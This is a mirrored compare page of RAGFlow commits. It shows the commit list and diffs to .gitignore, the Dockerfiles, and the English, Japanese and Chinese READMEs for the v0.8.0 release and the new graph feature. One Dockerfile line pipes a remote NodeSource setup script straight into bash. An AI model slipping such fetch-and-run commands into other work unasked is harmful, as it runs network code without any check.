mirror of
https://github.com/infiniflow/ragflow.git
synced 2025-12-08 20:42:30 +08:00
Compare commits
188 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 3413f43b47 | |||
| f8aa31b159 | |||
| 669d634d74 | |||
| 59417016a8 | |||
| 1eb1f7ad33 | |||
| 98295caffe | |||
| f5dc94fc85 | |||
| c889ef6363 | |||
| 593c20889d | |||
| fce3f6df8e | |||
| 61557a101a | |||
| 1f967191d4 | |||
| 0f597b9817 | |||
| 1cff117dc9 | |||
| e3f5464457 | |||
| 6144a109ab | |||
| b3ebc66b13 | |||
| dcb3fb2073 | |||
| f4674ae9d0 | |||
| de610091eb | |||
| d57a68bc2a | |||
| a2eb0df875 | |||
| edc61e9b4c | |||
| 472fcba7af | |||
| 74ec3bc4d9 | |||
| a3f4258cfc | |||
| cf542e80b3 | |||
| 957cd55e4a | |||
| 25a8c076bf | |||
| 306108fe0e | |||
| daaf6aed50 | |||
| 3b50389ee7 | |||
| 258c9ea644 | |||
| acd78c5ef2 | |||
| 1d3e4844a5 | |||
| 4122695a1a | |||
| 3ccb62910b | |||
| a6765e9ca4 | |||
| dec3bf7503 | |||
| 745e98e56a | |||
| 1defc83506 | |||
| 65e59862e4 | |||
| 477a52620f | |||
| 7c9ea5cad9 | |||
| f6159ee4d3 | |||
| a7423e3a94 | |||
| 25c4c717cb | |||
| f9adeb9647 | |||
| 04487d1bce | |||
| 68b9a857c2 | |||
| 5fa3c2bdce | |||
| b5389f487c | |||
| 8b1c145e56 | |||
| 92e9320657 | |||
| 5eb21b9c7c | |||
| 4542346f18 | |||
| fc7cc1d36c | |||
| 751447bd4f | |||
| f26d01dfa3 | |||
| cd3c739982 | |||
| 44c7a0e281 | |||
| 8c9b54db31 | |||
| 6a7c2112f7 | |||
| 0acf4194ca | |||
| 89004f1faf | |||
| 5a36866cf2 | |||
| c8523dc6fd | |||
| 840e921e96 | |||
| 5a1e01d96f | |||
| fbb8cbfc67 | |||
| 0ce720a247 | |||
| 47926a95ae | |||
| ff8793a031 | |||
| a95c1d45f0 | |||
| 45853505bb | |||
| b3f782b3d3 | |||
| 16a1d24a02 | |||
| a943aefa4d | |||
| 038ca8c0ea | |||
| fa5695c250 | |||
| e43208a1ca | |||
| fef663a59d | |||
| 83b91d90fe | |||
| f6ae8fcb71 | |||
| d1ea429bdd | |||
| b75bb1d8d3 | |||
| 6c6f5a3a47 | |||
| 80163c043e | |||
| 9fcf9a10c6 | |||
| 38bd02f402 | |||
| 9a0736b20f | |||
| 4fcd05ad23 | |||
| f8fe4154e8 | |||
| 57970570ee | |||
| d185a2e7f2 | |||
| a4ea5a120b | |||
| 15bf9f8c25 | |||
| 18f4a6b35c | |||
| f7cdb2678c | |||
| 3c1444ab19 | |||
| fb56a29478 | |||
| e99e8b93fb | |||
| 5ec19b5f53 | |||
| 0b90aab22c | |||
| fe1805fa0e | |||
| f73f7b969c | |||
| 81d1c5a695 | |||
| 8d667d5abd | |||
| 01ad2e5296 | |||
| fcdda9f8c5 | |||
| e35f7610e7 | |||
| 7920a5c78d | |||
| 4d957f2d3b | |||
| a89389a05a | |||
| d9a9be4b4c | |||
| 6be3626372 | |||
| 1eb4caf02a | |||
| f04fb36c26 | |||
| 747e69ef68 | |||
| c68767acdd | |||
| 4447039a4c | |||
| 90975460af | |||
| 7dc39cbfa6 | |||
| a25d32496c | |||
| 2023fdc13e | |||
| 64c83f300a | |||
| 3b7b6240c3 | |||
| e05395d2a7 | |||
| 169281958b | |||
| abcd3d2469 | |||
| 2cc89211f6 | |||
| 0e3a877e5c | |||
| da64cfd173 | |||
| ff5ea266d2 | |||
| 8902d92d0e | |||
| e28d13e3b4 | |||
| 0b92f02672 | |||
| cf2f6592dd | |||
| 97ced2f667 | |||
| 7eb69fe6d9 | |||
| 68a698655a | |||
| f900e432f3 | |||
| 267d6b28be | |||
| 706985c188 | |||
| 59efba3d87 | |||
| 22468a8590 | |||
| d0951ee27b | |||
| 31da511d1d | |||
| f8d0d657fb | |||
| 923c3b8cac | |||
| 2ff1b410b9 | |||
| f65d6a957b | |||
| 722c342d56 | |||
| dbdae8e83c | |||
| 6399a4fde2 | |||
| 631753f1a9 | |||
| ad87825a1b | |||
| b04f0510f9 | |||
| 1552dca28d | |||
| db35e9df4f | |||
| d9dc183a0e | |||
| 195498daaa | |||
| 4454ba7a1e | |||
| 72c6784ff8 | |||
| b6980d8a16 | |||
| 39ac3b1e60 | |||
| b8eedbdd86 | |||
| 8295979bb2 | |||
| 037657c1ce | |||
| 4fba0427eb | |||
| c74d4d683e | |||
| 0b15c47d70 | |||
| 7d41de42a1 | |||
| 9517a27844 | |||
| cc064040a2 | |||
| cdea1d0a85 | |||
| 1de31ca9f6 | |||
| 4ec845c0a6 | |||
| c58a1c48eb | |||
| fefe7124a1 | |||
| ebdc283cd5 | |||
| 260c68f60c | |||
| 5d2f7136dd | |||
| b85c15cc96 | |||
| 9ed0e50f6b | |||
| b9bb11879f | |||
| dc7afe46fb | |||
| 4f4d8baf49 |
8
.gitignore
vendored
8
.gitignore
vendored
@ -29,4 +29,10 @@ Cargo.lock
|
||||
docker/ragflow-logs/
|
||||
/flask_session
|
||||
/logs
|
||||
rag/res/deepdoc
|
||||
rag/res/deepdoc
|
||||
|
||||
# Exclude sdk generated files
|
||||
sdk/python/ragflow.egg-info/
|
||||
sdk/python/build/
|
||||
sdk/python/dist/
|
||||
sdk/python/ragflow_sdk.egg-info/
|
||||
@ -10,6 +10,7 @@ ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./graph ./graph
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
@ -12,7 +12,7 @@ RUN apt-get update && \
|
||||
rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
|
||||
apt-get install -y nodejs nginx ffmpeg libsm6 libxext6 libgl1
|
||||
apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1
|
||||
|
||||
ADD ./web ./web
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
@ -21,6 +21,7 @@ ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./graph ./graph
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
@ -30,6 +30,7 @@ ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./requirements.txt ./requirements.txt
|
||||
ADD ./graph ./graph
|
||||
|
||||
RUN apt install openmpi-bin openmpi-common libopenmpi-dev
|
||||
ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
|
||||
|
||||
@ -30,6 +30,7 @@ ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./requirements.txt ./requirements.txt
|
||||
ADD ./graph ./graph
|
||||
|
||||
RUN dnf install -y openmpi openmpi-devel python3-openmpi
|
||||
ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
|
||||
|
||||
48
README.md
48
README.md
@ -17,12 +17,20 @@
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.7.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.7.0"></a>
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.8.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
<details open>
|
||||
<summary></b>📕 Table of Contents</b></summary>
|
||||
|
||||
@ -49,22 +57,23 @@
|
||||
## 🎮 Demo
|
||||
|
||||
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 📌 Latest Updates
|
||||
|
||||
- 2024-05-30 Integrates [BCE](https://github.com/netease-youdao/BCEmbedding), [BGE](https://github.com/FlagOpen/FlagEmbedding), and [Colbert](https://github.com/stanford-futuredata/ColBERT) reranker models.
|
||||
- 2024-07-08 Supports [Graph](./graph/README.md).
|
||||
|
||||
- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method. Supports extracting images from Docx files. Supports extracting tables from Markdown files.
|
||||
- 2024-06-14 Supports PDF in the Q&A parsing method.
|
||||
- 2024-06-06 Supports [Self-RAG](https://huggingface.co/papers/2310.11511), which is enabled by default in dialog settings.
|
||||
- 2024-05-30 Integrates [BCE](https://github.com/netease-youdao/BCEmbedding) and [BGE](https://github.com/FlagOpen/FlagEmbedding) reranker models.
|
||||
- 2024-05-28 Supports LLM Baichuan and VolcanoArk.
|
||||
- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
|
||||
- 2024-05-21 Supports streaming output and text chunk retrieval API.
|
||||
- 2024-05-15 Integrates OpenAI GPT-4o.
|
||||
- 2024-05-08 Integrates LLM DeepSeek-V2.
|
||||
- 2024-04-26 Adds file management.
|
||||
- 2024-04-19 Supports conversation API ([detail](./docs/references/api.md)).
|
||||
- 2024-04-16 Integrates an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding), and [FastEmbed](https://github.com/qdrant/fastembed), which is designed specifically for light and speedy embedding.
|
||||
- 2024-04-11 Supports [Xinference](./docs/guides/deploy_local_llm.md) for local LLM deployment.
|
||||
- 2024-04-10 Adds a new layout recognition model for analyzing legal documents.
|
||||
- 2024-04-08 Supports [Ollama](./docs/guides/deploy_local_llm.md) for local LLM deployment.
|
||||
- 2024-04-07 Supports Chinese UI.
|
||||
|
||||
## 🌟 Key Features
|
||||
|
||||
@ -112,7 +121,7 @@ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
|
||||
|
||||
### 🚀 Start up the server
|
||||
|
||||
1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/guides/max_map_count.md)):
|
||||
1. Ensure `vm.max_map_count` >= 262144:
|
||||
|
||||
> To check the value of `vm.max_map_count`:
|
||||
>
|
||||
@ -141,7 +150,7 @@ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
|
||||
|
||||
3. Build the pre-built Docker images and start up the server:
|
||||
|
||||
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.7.0`, before running the following commands.
|
||||
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.
|
||||
|
||||
```bash
|
||||
$ cd ragflow/docker
|
||||
@ -176,10 +185,10 @@ Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
|
||||
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.
|
||||
|
||||
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
|
||||
> With default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
||||
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
||||
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
|
||||
|
||||
> See [./docs/guides/llm_api_key_setup.md](./docs/guides/llm_api_key_setup.md) for more information.
|
||||
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
|
||||
|
||||
_The show is now on!_
|
||||
|
||||
@ -291,7 +300,7 @@ To launch the service from source:
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ vim .umirc.ts
|
||||
# Update proxy.target to 127.0.0.1:9380
|
||||
# Update proxy.target to http://127.0.0.1:9380
|
||||
$ npm run dev
|
||||
```
|
||||
|
||||
@ -312,8 +321,10 @@ To launch the service from source:
|
||||
|
||||
## 📚 Documentation
|
||||
|
||||
- [Quickstart](./docs/quickstart.md)
|
||||
- [FAQ](./docs/references/faq.md)
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 Roadmap
|
||||
|
||||
@ -323,6 +334,7 @@ See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 Contributing
|
||||
|
||||
|
||||
52
README_ja.md
52
README_ja.md
@ -17,13 +17,21 @@
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.7.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.7.0"></a>
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.8.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
## 💡 RAGFlow とは?
|
||||
|
||||
[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
|
||||
@ -31,24 +39,21 @@
|
||||
## 🎮 Demo
|
||||
|
||||
デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 📌 最新情報
|
||||
|
||||
- 2024-05-30 [BCE](https://github.com/netease-youdao/BCEmbedding)、[BGE](https://github.com/FlagOpen/FlagEmbedding)、[Colbert](https://github.com/stanford-futuredata/ColBERT) reranker を統合。
|
||||
- 2024-07-08 [Graph](./graph/README.md) に対応しました。.
|
||||
- 2024-06-27 Q&A解析方式はMarkdownファイルとDocxファイルをサポートしています。Docxファイルからの画像の抽出をサポートします。Markdownファイルからテーブルを抽出することをサポートします。
|
||||
- 2024-06-14 Q&A 解析メソッドは PDF ファイルをサポートしています。
|
||||
- 2024-06-06 会話設定でデフォルトでチェックされている [Self-RAG](https://huggingface.co/papers/2310.11511) をサポートします。
|
||||
- 2024-05-30 [BCE](https://github.com/netease-youdao/BCEmbedding) 、[BGE](https://github.com/FlagOpen/FlagEmbedding) reranker を統合。
|
||||
- 2024-05-28 LLM BaichuanとVolcanoArkを統合しました。
|
||||
- 2024-05-23 より良いテキスト検索のために[RAPTOR](https://arxiv.org/html/2401.18059v1)をサポート。
|
||||
- 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
|
||||
- 2024-05-21 ストリーミング出力とテキストチャンク取得APIをサポート。
|
||||
- 2024-05-15 OpenAI GPT-4oを統合しました。
|
||||
- 2024-05-08 LLM DeepSeek-V2を統合しました。
|
||||
- 2024-04-26 「ファイル管理」機能を追加しました。
|
||||
- 2024-04-19 会話 API をサポートします ([詳細](./docs/references/api.md))。
|
||||
- 2024-04-16 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) から埋め込みモデル「bce-embedding-base_v1」を追加します。
|
||||
- 2024-04-16 [FastEmbed](https://github.com/qdrant/fastembed) は、軽量かつ高速な埋め込み用に設計されています。
|
||||
- 2024-04-11 ローカル LLM デプロイメント用に [Xinference](./docs/guides/deploy_local_llm.md) をサポートします。
|
||||
- 2024-04-10 メソッド「Laws」に新しいレイアウト認識モデルを追加します。
|
||||
- 2024-04-08 [Ollama](./docs/guides/deploy_local_llm.md) を使用した大規模モデルのローカライズされたデプロイメントをサポートします。
|
||||
- 2024-04-07 中国語インターフェースをサポートします。
|
||||
|
||||
|
||||
## 🌟 主な特徴
|
||||
|
||||
@ -96,7 +101,7 @@
|
||||
|
||||
### 🚀 サーバーを起動
|
||||
|
||||
1. `vm.max_map_count` >= 262144 であることを確認する【[もっと](./docs/guides/max_map_count.md)】:
|
||||
1. `vm.max_map_count` >= 262144 であることを確認する:
|
||||
|
||||
> `vm.max_map_count` の値をチェックするには:
|
||||
>
|
||||
@ -131,7 +136,7 @@
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.7.0として、上記のコマンドを実行してください。
|
||||
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.8.0として、上記のコマンドを実行してください。
|
||||
|
||||
> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。
|
||||
|
||||
@ -162,7 +167,7 @@
|
||||
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
|
||||
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
|
||||
|
||||
> 詳しくは [./docs/guides/llm_api_key_setup.md](./docs/guides/llm_api_key_setup.md) を参照してください。
|
||||
> 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
|
||||
|
||||
_これで初期設定完了!ショーの開幕です!_
|
||||
|
||||
@ -193,7 +198,7 @@
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:v0.7.0 .
|
||||
$ docker build -t infiniflow/ragflow:v0.8.0 .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
@ -261,8 +266,10 @@ $ bash ./entrypoint.sh
|
||||
|
||||
## 📚 ドキュメンテーション
|
||||
|
||||
- [Quickstart](./docs/quickstart.md)
|
||||
- [FAQ](./docs/references/faq.md)
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 ロードマップ
|
||||
|
||||
@ -272,6 +279,7 @@ $ bash ./entrypoint.sh
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 コントリビュート
|
||||
|
||||
|
||||
49
README_zh.md
49
README_zh.md
@ -17,12 +17,20 @@
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.7.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.7.0"></a>
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.8.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
## 💡 RAGFlow 是什么?
|
||||
|
||||
[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
|
||||
@ -30,22 +38,22 @@
|
||||
## 🎮 Demo 试用
|
||||
|
||||
请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 📌 近期更新
|
||||
|
||||
- 2024-05-30 集成 [BCE](https://github.com/netease-youdao/BCEmbedding), [BGE](https://github.com/FlagOpen/FlagEmbedding) 和 [Colbert](https://github.com/stanford-futuredata/ColBERT) 重排序模型。
|
||||
- 2024-07-08 支持 [Graph](./graph/README.md)。
|
||||
- 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件。支持提取出 Docx 文件中的图片。支持提取出 Markdown 文件中的表格。
|
||||
- 2024-06-14 Q&A 解析方式支持 PDF 文件。
|
||||
- 2024-06-06 支持 [Self-RAG](https://huggingface.co/papers/2310.11511) ,在对话设置里面默认勾选。
|
||||
- 2024-05-30 集成 [BCE](https://github.com/netease-youdao/BCEmbedding) 和 [BGE](https://github.com/FlagOpen/FlagEmbedding) 重排序模型。
|
||||
- 2024-05-28 集成大模型 Baichuan 和火山方舟。
|
||||
- 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
|
||||
- 2024-05-21 支持流式结果输出和文本块获取API。
|
||||
- 2024-05-15 集成大模型 OpenAI GPT-4o。
|
||||
- 2024-05-08 集成大模型 DeepSeek。
|
||||
- 2024-04-26 增添了'文件管理'功能。
|
||||
- 2024-04-19 支持对话 API ([更多](./docs/references/api.md))。
|
||||
- 2024-04-16 集成嵌入模型 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) 和 专为轻型和高速嵌入而设计的 [FastEmbed](https://github.com/qdrant/fastembed)。
|
||||
- 2024-04-11 支持用 [Xinference](./docs/guides/deploy_local_llm.md) 本地化部署大模型。
|
||||
- 2024-04-10 为‘Laws’版面分析增加了底层模型。
|
||||
- 2024-04-08 支持用 [Ollama](./docs/guides/deploy_local_llm.md) 本地化部署大模型。
|
||||
- 2024-04-07 支持中文界面。
|
||||
|
||||
## 🌟 主要功能
|
||||
|
||||
@ -66,7 +74,7 @@
|
||||
|
||||
### 🍔 **兼容各类异构数据源**
|
||||
|
||||
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据, 网页等。
|
||||
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
|
||||
|
||||
### 🛀 **全程无忧、自动化的 RAG 工作流**
|
||||
|
||||
@ -93,7 +101,7 @@
|
||||
|
||||
### 🚀 启动服务器
|
||||
|
||||
1. 确保 `vm.max_map_count` 不小于 262144 【[更多](./docs/guides/max_map_count.md)】:
|
||||
1. 确保 `vm.max_map_count` 不小于 262144:
|
||||
|
||||
> 如需确认 `vm.max_map_count` 的大小:
|
||||
>
|
||||
@ -128,7 +136,7 @@
|
||||
$ docker compose -f docker-compose-CN.yml up -d
|
||||
```
|
||||
|
||||
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.7.0,然后运行上述命令。
|
||||
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.8.0,然后运行上述命令。
|
||||
|
||||
> 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。
|
||||
|
||||
@ -159,7 +167,7 @@
|
||||
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
|
||||
6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
|
||||
|
||||
> 详见 [./docs/guides/llm_api_key_setup.md](./docs/guides/llm_api_key_setup.md)。
|
||||
> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
|
||||
|
||||
_好戏开始,接着奏乐接着舞!_
|
||||
|
||||
@ -190,7 +198,7 @@
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:v0.7.0 .
|
||||
$ docker build -t infiniflow/ragflow:v0.8.0 .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
@ -260,7 +268,7 @@ $ bash ./entrypoint.sh
|
||||
$ cd web
|
||||
$ npm install --registry=https://registry.npmmirror.com --force
|
||||
$ vim .umirc.ts
|
||||
# 修改proxy.target为127.0.0.1:9380
|
||||
# 修改proxy.target为http://127.0.0.1:9380
|
||||
$ npm run dev
|
||||
```
|
||||
|
||||
@ -279,8 +287,10 @@ $ systemctl start nginx
|
||||
```
|
||||
## 📚 技术文档
|
||||
|
||||
- [Quickstart](./docs/quickstart.md)
|
||||
- [FAQ](./docs/references/faq.md)
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 路线图
|
||||
|
||||
@ -290,6 +300,7 @@ $ systemctl start nginx
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 贡献指南
|
||||
|
||||
|
||||
74
SECURITY.md
Normal file
74
